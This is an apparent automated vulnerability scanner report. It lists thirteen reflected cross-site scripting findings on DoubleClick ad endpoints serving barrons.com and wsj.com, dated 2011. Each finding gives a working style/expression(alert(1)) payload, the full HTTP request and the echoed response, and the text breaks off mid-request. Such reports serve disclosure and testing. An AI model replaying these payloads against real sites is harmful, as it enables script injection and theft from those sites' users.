The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://ad.doubleclick.net/adi/barrons.com/b2pfreezone_free [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/b2pfreezone_free

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee5e2"style%3d"x%3aexpression(alert(1))"76d27de00ec was submitted in the !category parameter. This input was echoed as ee5e2"style="x:expression(alert(1))"76d27de00ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/b2pfreezone_free;!category=;page=bottomSubscribePromoFree;msrc=BOL_hpp_dc;biz=1053;;;mc=0;tile=7;sz=520x30;ord=1659165916591659;ee5e2"style%3d"x%3aexpression(alert(1))"76d27de00ec HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/article/SB50001424052970203286304576313262992330454.html?mod=BOL_hpp_dc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:24:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 587

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/z;231253341;0-0;0;20454327;25388-520/30;38882585/38900342/1;;~okv=;!category=;page=bottomSubscribePromoFree;msrc=BOL_hpp_dc;biz=1053;;;mc=0;tile=7;sz=520x30;ee5e2"style="x:expression(alert(1))"76d27de00ec;~aopt=2/1/ff/1;~sscs=%3fhttps://order.barrons.com/sub/xdef/002/6BCWBL_OOT">
...[SNIP]...

4.2. http://ad.doubleclick.net/adi/barrons.com/b2pfreezone_free [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/b2pfreezone_free

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f363c"style%3d"x%3aexpression(alert(1))"318f1b6bb74 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f363c"style="x:expression(alert(1))"318f1b6bb74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/b2pfreezone_free;!category=;page=bottomSubscribePromoFree;msrc=BOL_hpp_dc;biz=1053;;;mc=0;tile=7;sz=520x30;ord=1659165916591659;&f363c"style%3d"x%3aexpression(alert(1))"318f1b6bb74=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/article/SB50001424052970203286304576313262992330454.html?mod=BOL_hpp_dc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:24:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 590

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/z;231253341;0-0;0;20454327;25388-520/30;38882585/38900342/1;;~okv=;!category=;page=bottomSubscribePromoFree;msrc=BOL_hpp_dc;biz=1053;;;mc=0;tile=7;sz=520x30;&f363c"style="x:expression(alert(1))"318f1b6bb74=1;~aopt=2/1/ff/1;~sscs=%3fhttps://order.barrons.com/sub/xdef/002/6BCWBL_OOT">
...[SNIP]...

4.3. http://ad.doubleclick.net/adi/barrons.com/columnist [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/columnist

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78bb2"style%3d"x%3aexpression(alert(1))"9b4cd51018c was submitted in the !category parameter. This input was echoed as 78bb2"style="x:expression(alert(1))"9b4cd51018c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/columnist;!category=;biz=1053;;s=8_10001;mc=0;tile=4;sz=377x140;ord=2817281728172817;78bb2"style%3d"x%3aexpression(alert(1))"9b4cd51018c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://topics.barrons.com/person/S/michael-santoli/6041
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:31:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 544

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/i;241062548;0-0;0;51787543;29332-377/140;42095072/42112859/1;;~okv=;!category=;biz=1053;;s=8_10001;mc=0;tile=4;sz=377x140;78bb2"style="x:expression(alert(1))"9b4cd51018c;~aopt=2/1/ff/1;~sscs=%3fhttp://www.smartmoney.com">
...[SNIP]...

4.4. http://ad.doubleclick.net/adi/barrons.com/public_front [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/public_front

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6272f"style%3d"x%3aexpression(alert(1))"8a464770ae9 was submitted in the !category parameter. This input was echoed as 6272f"style="x:expression(alert(1))"8a464770ae9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/public_front;!category=;;mc=0;tile=2;sz=280x61;ord=2194219421942194;6272f"style%3d"x%3aexpression(alert(1))"8a464770ae9 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:15:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 535

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/r;231251608;0-0;0;13405531;28940-280/61;38881709/38899466/1;;~okv=;!category=;;mc=0;tile=2;sz=280x61;6272f"style="x:expression(alert(1))"8a464770ae9;~aopt=2/1/ff/1;~sscs=%3fhttps://order.barrons.com/sub/xdef/002/6BCWAA_OOTB9">
...[SNIP]...

4.5. http://ad.doubleclick.net/adi/barrons.com/public_front [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/public_front

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc865"style%3d"x%3aexpression(alert(1))"4bae22cf300 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dc865"style="x:expression(alert(1))"4bae22cf300 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/public_front;!category=;;mc=0;tile=2;sz=280x61;ord=2194219421942194;&dc865"style%3d"x%3aexpression(alert(1))"4bae22cf300=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:15:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 538

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/r;231251608;0-0;0;13405531;28940-280/61;38881709/38899466/1;;~okv=;!category=;;mc=0;tile=2;sz=280x61;&dc865"style="x:expression(alert(1))"4bae22cf300=1;~aopt=2/1/ff/1;~sscs=%3fhttps://order.barrons.com/sub/xdef/002/6BCWAA_OOTB9">
...[SNIP]...

4.6. http://ad.doubleclick.net/adi/barrons.com/sponsor_pickspans [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/sponsor_pickspans

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e79e"style%3d"x%3aexpression(alert(1))"93db2689eb3 was submitted in the !category parameter. This input was echoed as 2e79e"style="x:expression(alert(1))"93db2689eb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/sponsor_pickspans;!category=;;mc=0;tile=4;sz=140x31;ord=2194219421942194;2e79e"style%3d"x%3aexpression(alert(1))"93db2689eb3 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:15:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 598

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;237099366;0-0;0;45555479;1932-140/31;40930725/40948512/1;;~okv=;!category=;;mc=0;tile=4;sz=140x31;2e79e"style="x:expression(alert(1))"93db2689eb3;~aopt=2/1/ff/1;~sscs=%3fhttp://ad.doubleclick.net/clk;237018358;60534698;r?http://www.wellsfargoadvisors.com?cid=OB110032231">
...[SNIP]...

4.7. http://ad.doubleclick.net/adi/barrons.com/sponsor_pickspans [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/barrons.com/sponsor_pickspans

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5892a"style%3d"x%3aexpression(alert(1))"347383c07ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5892a"style="x:expression(alert(1))"347383c07ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/barrons.com/sponsor_pickspans;!category=;;mc=0;tile=4;sz=140x31;ord=2194219421942194;&5892a"style%3d"x%3aexpression(alert(1))"347383c07ec=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:15:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 601

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/f;237099366;0-0;0;45555479;1932-140/31;40930725/40948512/1;;~okv=;!category=;;mc=0;tile=4;sz=140x31;&5892a"style="x:expression(alert(1))"347383c07ec=1;~aopt=2/1/ff/1;~sscs=%3fhttp://ad.doubleclick.net/clk;237018358;60534698;r?http://www.wellsfargoadvisors.com?cid=OB110032231">
...[SNIP]...

4.8. http://ad.doubleclick.net/adi/interactive.wsj.com/business_econ_front [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/business_econ_front

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2c68"style%3d"x%3aexpression(alert(1))"2faf44bbda4 was submitted in the !category parameter. This input was echoed as f2c68"style="x:expression(alert(1))"2faf44bbda4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/business_econ_front;!category=;;mc=b2pfreezone;tile=2;sz=377x140;ord=5370537053705370;f2c68"style%3d"x%3aexpression(alert(1))"2faf44bbda4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-economy.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:12:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 499

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/t;241062548;0-0;0;29217796;29332-377/140;42095072/42112859/1;;~okv=;!category=;;mc=b2pfreezone;tile=2;sz=377x140;f2c68"style="x:expression(alert(1))"2faf44bbda4;~aopt=2/1/ff/1;~sscs=%3fhttp://www.smartmoney.com">
...[SNIP]...

4.9. http://ad.doubleclick.net/adi/interactive.wsj.com/news_front [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/news_front

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be652"style%3d"x%3aexpression(alert(1))"dfb7c8c44e4 was submitted in the !category parameter. This input was echoed as be652"style="x:expression(alert(1))"dfb7c8c44e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/news_front;!category=;page=article;msrc=WSJ_hp_LEFTTopStories;;mc=b2pfreezone;tile=3;sz=571x18;ord=8089808980898089;be652"style%3d"x%3aexpression(alert(1))"dfb7c8c44e4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748703864204576321552255041680.html?mod=WSJ_hp_LEFTTopStories
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:10:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 561

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;232232404;0-0;11;29218002;28583-571/18;39182112/39199899/1;;~okv=;!category=;page=article;msrc=WSJ_hp_LEFTTopStories;;mc=b2pfreezone;tile=3;sz=571x18;be652"style="x:expression(alert(1))"dfb7c8c44e4;~aopt=2/1/ff/1;~sscs=%3fhttps://order.wsj.com/sub/xdef/101/6BCWAE_OOT20">
...[SNIP]...

4.10. http://ad.doubleclick.net/adi/interactive.wsj.com/news_front [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/news_front

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98f33"%20style%3dx%3aexpression(alert(1))%208546d2741e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 98f33" style=x:expression(alert(1)) 8546d2741e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/news_front;!category=;page=article;msrc=WSJ_hp_LEFTTopStories;;mc=b2pfreezone;tile=3;sz=571x18;ord=8089808980898089;&98f33"%20style%3dx%3aexpression(alert(1))%208546d2741e6=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748703864204576321552255041680.html?mod=WSJ_hp_LEFTTopStories
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 10:10:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 564

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/m;232232404;0-0;11;29218002;28583-571/18;39182112/39199899/1;;~okv=;!category=;page=article;msrc=WSJ_hp_LEFTTopStories;;mc=b2pfreezone;tile=3;sz=571x18;&98f33" style=x:expression(alert(1)) 8546d2741e6=1;~aopt=2/1/ff/1;~sscs=%3fhttps://order.wsj.com/sub/xdef/101/6BCWAE_OOT20">
...[SNIP]...

4.11. http://ad.doubleclick.net/adi/interactive.wsj.com/news_taxreportstory [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/news_taxreportstory

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f99f7"style%3d"x%3aexpression(alert(1))"48997269cdb was submitted in the !category parameter. This input was echoed as f99f7"style="x:expression(alert(1))"48997269cdb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/news_taxreportstory;!category=;page=article;msrc=WSJ_newsreel_personalFinance;s=8_10001;mc=wsjfreezone;tile=3;sz=377x135;ord=8961896189618961;f99f7"style%3d"x%3aexpression(alert(1))"48997269cdb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704681904576319301584731990.html?mod=WSJ_newsreel_personalFinance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 11:37:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 599

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/s;223842858;0-0;2;15067118;33675-377/135;41133343/41151130/1;;~okv=;!category=;page=article;msrc=WSJ_newsreel_personalFinance;s=8_10001;mc=wsjfreezone;tile=3;sz=377x135;f99f7"style="x:expression(alert(1))"48997269cdb;~aopt=2/1/ff/1;~sscs=%3fhttp://itunes.apple.com/app/the-wall-street-journal/id364387007?mt=8">
...[SNIP]...

4.12. http://ad.doubleclick.net/adi/interactive.wsj.com/news_taxreportstory [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/news_taxreportstory

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1befe"style%3d"x%3aexpression(alert(1))"3c3863dbd13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1befe"style="x:expression(alert(1))"3c3863dbd13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/news_taxreportstory;!category=;page=article;msrc=WSJ_newsreel_personalFinance;s=8_10001;mc=wsjfreezone;tile=3;sz=377x135;ord=8961896189618961;&1befe"style%3d"x%3aexpression(alert(1))"3c3863dbd13=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704681904576319301584731990.html?mod=WSJ_newsreel_personalFinance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 14 May 2011 11:37:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 602

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b07/0/0/%2a/s;223842858;0-0;2;15067118;33675-377/135;41133343/41151130/1;;~okv=;!category=;page=article;msrc=WSJ_newsreel_personalFinance;s=8_10001;mc=wsjfreezone;tile=3;sz=377x135;&1befe"style="x:expression(alert(1))"3c3863dbd13=1;~aopt=2/1/ff/1;~sscs=%3fhttp://itunes.apple.com/app/the-wall-street-journal/id364387007?mt=8">
...[SNIP]...

4.13. http://ad.doubleclick.net/adi/interactive.wsj.com/personalfinance_newsreel [!category parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/personalfinance_newsreel

Issue detail

The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e62da"style%3d"x%3aexpression(alert(1))"2236a8fae01 was submitted in the !category parameter. This input was echoed as e62da"style="x:expression(alert(1))"2236a8fae01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /adi/interactive.wsj.com/personalfinance_newsreel;!category=;page=newsReelAd;biz=1053;;s=8_10001;mc=b2pfreezone;tile=2;sz=230x70;ord=3954395439543954;e62da"style%3d"x%3aexpression(alert(1))"2236a8fae01 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2400_NewsReel.html?baseDocId=SB10001424052748703730804576313682030967852
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
